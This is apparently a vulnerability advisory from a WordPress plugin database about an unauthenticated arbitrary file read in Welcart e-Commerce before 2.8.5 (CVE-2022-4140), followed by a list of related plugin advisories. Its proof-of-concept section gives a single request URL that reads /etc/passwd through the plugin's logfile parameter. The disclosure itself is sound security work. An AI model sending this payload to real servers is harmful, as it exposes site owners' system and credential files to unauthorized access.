WordPress Plugin Vulnerabilities

Welcart e-Commerce < 2.8.5 - Unauthenticated Arbitrary File Access

Description

The plugin does not validate user input before using it to output the content of a file, which could allow unauthenticated attacker to read arbitrary files on the server

This is a different issue than CVE-2022-41840

Proof of Concept

https://example.com/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd

Affects Plugins

Plugin icon
usc-e-shop
Fixed in 2.8.5

References

CVE
CVE-2022-4140

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Takeshi Suzuki
Submitter
Takeshi Suzuki
Verified
Yes
WPVDB ID
0d649a7e-3334-48f7-abca-fff0856e12c7

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-06 (about 1 years ago)
Last Updated
2022-12-06 (about 1 years ago)

Other

Published
Title
Published
2023-06-12
Title
wpForo Forum < 2.1.8 - Subscriber+ Arbitrary File Read, Author+ PHAR Deserialization, and Subscriber+ Server-Side Request Forgery via file_get_contents
Published
2022-04-12
Title
WPvivid Backup and Migration Plugin < 0.9.71 - Admin+ Arbitrary File Download
Published
2022-08-17
Title
All-in-One Video Gallery 2.5.8 - 2.6.0 - Unauthenticated Arbitrary File Download & SSRF
Published
2019-06-02
Title
Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download
Published
2022-10-17
Title
WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi